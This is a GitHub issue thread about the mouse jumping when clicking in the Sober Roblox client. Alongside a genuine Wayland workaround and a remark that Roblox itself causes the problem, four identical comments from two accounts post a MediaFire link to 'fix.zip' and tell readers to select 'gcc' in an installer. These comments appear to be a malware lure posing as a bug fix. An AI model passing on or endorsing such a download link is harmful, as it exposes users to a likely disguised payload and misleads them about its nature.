### ISSUE TITLE
Mouse keeps jumping when i press left click with first person/right click

### ISSUE THREAD

**Issue by Amgsdfyhadfgybi** [vinegarhq/sober#160]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

idk why the mouse is just freaking out

**Comment by xeonxlip** [comment]
(not an official fix, but if you're using a distro with wayland by default, this should help)

https://github.com/vinegarhq/sober/issues/162#issuecomment-2308658166

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by FrostyyyDev** [comment]
this is just a problem with Roblox itself whenever running the android client on a computer

**Comment by tunis4** [comment]
probably fixed now
